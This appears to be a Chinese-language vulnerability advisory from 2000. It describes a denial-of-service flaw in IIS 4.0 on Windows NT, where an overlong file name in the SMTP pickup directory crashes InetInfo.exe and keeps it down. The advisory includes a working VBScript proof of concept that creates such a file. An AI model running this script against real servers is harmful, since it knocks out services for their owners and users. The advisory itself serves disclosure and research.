发布日期：2000-02-21
更新日期：2000-02-21

受影响系统：

Windows NT Server 4.0 with IIS 4.0（所有SP）

不受影响系统：

Windows 2000

描述：

---

来源：valentijn <iam@my.net>

    通过在\mailroot\pickup目录下创建长文件名文件可能会使InetInfo.exe（IIS应用程序服务）崩溃。远程攻击者利用这个漏洞能对IIS进行拒绝服务（DoS）攻击。
    \mailroot\pickup目录是由inetinfo.exe中SMTP服务器部份处理操作的。当监测到一条消息时将立即对其进行解析。在IIS的解析机制中，如果\mailroot\pickup目录下含有超过86字符长度的文件名，会使IIS崩溃。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

    以下脚本例子能在远程服务器上创建这种文件：

<example script>

' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

         Set fso = createobject("scripting.filesystemobject")
         Thename = Createkey & fso.GetTempName & ".eml"
         Set Thefile =  fso.GetFolder(rootpath).CreateTextFile(TheName)
                 Thefile.writeline "X-Sender: CRASHTHIS@my.net"
                 Thefile.writeline "X-Receiver: dump@my.net"
                 Thefile.writeline "From: <CRASHTHIS@my.net>"
                 Thefile.writeline "To: <dump@my.net>"
                 Thefile.writeline "Subject: MINE DID NOT CRASH"
                 Thefile.writeline "Date: " & now()
                 Thefile.writeline "X-Generator: " & Thename
         Thefile.close
         Set thefile = nothing
         Thename = ""

Function Createkey
         for z = 1 to 80
                         randomize
                         a =     Int((25 * Rnd) + 1)
                         password = password & chr(a+65)
         next
         Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as
the file is still there!

</example script>



建议：

---

    暂无。



浏览次数：6493
严重程度：0（网友投票）